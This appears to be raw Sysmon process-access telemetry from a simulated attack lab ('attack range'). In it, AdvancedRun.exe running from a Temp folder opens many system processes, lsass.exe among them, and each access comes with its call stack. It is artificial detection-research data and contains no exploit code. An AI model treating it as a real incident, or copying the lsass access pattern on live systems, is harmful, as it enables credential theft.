20:17:12.902{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.901{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.899{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004078596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 